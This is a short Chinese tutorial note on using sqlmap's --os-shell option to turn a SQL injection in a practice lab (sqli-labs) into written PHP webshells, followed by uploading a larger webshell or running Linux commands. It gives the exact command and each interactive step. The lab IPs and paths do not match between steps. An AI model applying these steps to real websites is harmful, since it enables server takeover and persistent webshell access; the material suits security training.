sqlmap写shell命令及步骤

写一篇利用工具sqlmap写shell的文章，网上已经有很多类似的文章了，感觉不是很详细，也是自己做个笔记再重温一遍sqlmap写shell命令及步骤吧

sqlmap.py -u "http://192.168.3.50/2sqli-labs/Less-1/?id=1" --os-shell

sqlmap写shell命令及步骤一：输入完语句之后首先会让你选择脚本类型，我这里是php的

sqlmap写shell命令及步骤二：接下来回车一下，又会出现4个选项(让你指定目录)我这个选择自定义目录，然后回车

sqlmap写shell命令及步骤三：接下来输入网站的根路径

sqlmap写shell命令及步骤四：会自动生成一个上传文件的地方

sqlmap写shell命令及步骤五：成功写入2个shell，一个用来执行命令的，另一个是用来上传的，打开链接：
​​​ http://10.1.1.136/vulnerabilities/exec/tmpujhum.php​​

sqlmap写shell命令及步骤六：接下来上传大马就行了，或者直接执行linux命令。